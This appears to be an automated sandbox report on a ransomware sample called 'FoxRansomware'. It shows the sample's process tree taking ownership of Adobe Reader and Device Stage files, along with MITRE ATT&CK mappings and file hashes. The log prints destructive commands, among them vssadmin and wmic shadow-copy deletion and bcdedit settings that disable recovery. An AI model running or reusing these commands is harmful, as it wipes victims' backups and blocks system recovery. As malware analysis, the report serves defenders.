C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:2144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:3112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:2228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:2588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:3300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:3280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:3436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵
- Modifies file permissions
PID:2472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "can03.ths" -nobanner3⤵PID:3256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "can03.ths" -nobanner4⤵PID:3064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:2168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵
- Modifies file permissions
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:3336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:3184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:2460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵
- Modifies file permissions
PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:3412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:2956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1340
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:3440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "watermark.png" -nobanner3⤵PID:3512
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "watermark.png" -nobanner4⤵PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:2360
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:1096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:1404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:2760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:3464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:3176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:3632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:2952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "background.png" -nobanner3⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "background.png" -nobanner4⤵PID:3364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:2772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:1296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:2944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:3952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:488
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:2636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:2476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:4076
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:1244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Modifies file permissions
PID:3716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "behavior.xml" -nobanner3⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "behavior.xml" -nobanner4⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:2312
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:704
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1580
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:3656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:3864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:4072
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:1360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "superbar.png" -nobanner3⤵PID:2880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "superbar.png" -nobanner4⤵PID:3832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:3872
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:2652
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B3111283-4A32-4E56-8985-77398DC18BF8} S-1-5-21-1658372521-4246568289-2509113762-1000:PIRBKNPS\Admin:Interactive:[1]1⤵PID:3048
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\OHL8ImHx.bat"2⤵PID:3884
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1320
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3492
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:2416
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:2452
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD51b24b47b51474e9138da1aad35b84b4f
SHA1669488be6aa1fb6bdd15e6f934e6c63d797ef9d6
SHA25608c410b6581b5267a1a306d01309de69be7e66bb9b01a70cecb41d3e8af677f4
SHA5122f9029792c1d187b04edfa8775a98574943d259de774acc20aef7bb8c88af26b0dc1c750245a5053e932b2b252e4ad7f97b0efcc662f02fe00e27892daff49e7
-
Filesize
1.2MB
MD5c82d64850d35cc6a536c11adbd261cf6
SHA19f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
76B
MD50baadb6d2d9bacc8162701588a1c4f4d
SHA109a2640b2befb757a0909208ba269e67291b29ed
SHA25643535676434dc3e85bbc0886eef617115708cb3528f2bd8140da8e9cef8752e9
SHA5121d61af692ed2dd0316a8496d672c743504fa34161791286b604d63465221d18d13d0ef61b4d2e78585e2b5a36ca26ee042c588fc22b0ec47f8d09efad36353e6
-
Filesize
477B
MD5f92eec0fafda07b88c536f56502c1c0c
SHA169951f6e0a14068358d3087c2ae4e8e3244cd572
SHA2561aa56b178ed19aab2c13dc0144511dfcd7d212db691fb656317f7da4a2f9fd6c
SHA51281b257ebfbb2e216aa4e0e2b323988c59103f257f0578911c6d4c4f54889d33c44643b73644ff294295556d23e0b6c9cb614cf6322abf436c02ed86859443c3a
-
Filesize
1KB
MD5bd6a2ba4afcb2e50f11ab510489b46db
SHA1180267b2a66e88229f57b03deef5d8301497a08d
SHA256fcc68213bb06de2347b87ca71a941beaa4aac968a57b143f49531b7054e048a8
SHA51274addd9d6ed8e4599741aebab3bde9efee2587542793ebdb02c629c991e7e706d5bb701c984ef40a61fa4f7c5c1b1aa938e9a8fe6e958c047d63e95c4d399bcc
-
Filesize
1KB
MD5f37c2ae95d0720f480f93876d55c79e6
SHA11064ade41a3923ccbd2984d565441ab9a7161fc8
SHA256ed0f2c19debd84ca51d0522f25dc9bdd3c5d46d7cd9291f06ba0acc28eaed259
SHA512e7b03fdace74fc91eb7ac6a498deeb32e6dbc84d339ef2071a21a80ac8c84c75849317df802c5db8a2f6da7b30ac1d96b84c9d4cf4165823b263028e81814af8
-
Filesize
2KB
MD5a200fcaedbb11c54f6cc6f6f230ff31a
SHA12c1b05fa373f5ac77c2189759ebd84d2c5ce3594
SHA25681fb5af4525de990997edfd39b30bd8164a029639c04a20a7f190fafe9af84ab
SHA5121a34fb395c2aa9d824a85e3fbd4ba0e3da7e1133dd812b545a680780d490836f32342426a861a3fa911aa6c708c7fa00a11b487bab74dac9072f024ff90d56c2
-
Filesize
3KB
MD5eabd1a8512f229615125a9b7aa8c833f
SHA18555fef7d77c4052a0ee17ee8049895af57f1b78
SHA256e2ea370968d34900f71de43734807b3ca9956c905b34ef2e2df75021f416ee39
SHA512bba3028f76c783d61694c24f3b707971a8d25a9cadb17a81dc0a7cb5ffab94e4b27cd7b6ca8375bc9a61664714858b9e15b9eb485414a4fa2138b289feb6b7dc
-
Filesize
24KB
MD52327a8cb7dc8918ab25bef33a417c245
SHA1b5c9d1e751108772b20dfeca65dc418fed1efa6c
SHA256c5889cc652e6df97df83ff90087383ef1580fad2c861a1b51795be0c7dbcadfc
SHA512486fee8871180bafe946194c353ab5faeb935146aeff07cbbaac0cf30543b40c5e42a7b10f5b24aaf22a8e35ca6a2cb5839a5e28afd8b5ed2236eb8ad0d837be
-
Filesize
226B
MD56921c4fbcbe7938ea15b7c39508fec49
SHA1a16293220e5c265a3e7fba58fbd4c0a4b41892f3
SHA256c2892f62b1a3f6b71e3d93ab9f82a4d672fbe8676641ecb3c12bae848fa4be8e
SHA5126b0963d93d77a2ce164bc2dabf906ec43301f294c52dff7a81b7f3b05c1435718793de06413eee0afc2419ee175f57ffbbf01b93461546d0075a762c178830bc
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
265B
MD5a9cebc551760d9278bbd3ff211535091
SHA13e09512f42f6d2323eb622febd66ff7cd11b1db7
SHA256702330b9d3164786eea68ddf3004f3f7a4be8e46e90884ccc201798b7572f76a
SHA512d39c8c56a1b60568f99d1329d3260f61ac7351778a3b0a9c140fc12b191cfd0010e6a15c6cb8d584b5f7d1db76c7c72b2ab013218d6af2814832d7706f2c985c
-
Filesize
260B
MD56aaa51d9191bdd3d965d48bfb6631022
SHA1ef265bab00f46e12dd2cbe36d7352e0d33bc0b70
SHA256d682a1c3a64922673c623ecbc12d2b90cd32302f6133c94c31ba33d135d049d7
SHA51296d45b5ac6a1c3aa5f75dbd3b865a79718330c8d8b5f846aa08e6e5d944cb08305305073e9498719b7901aae1fba35ef03d4cefaa8901de23259b93894c3a0e9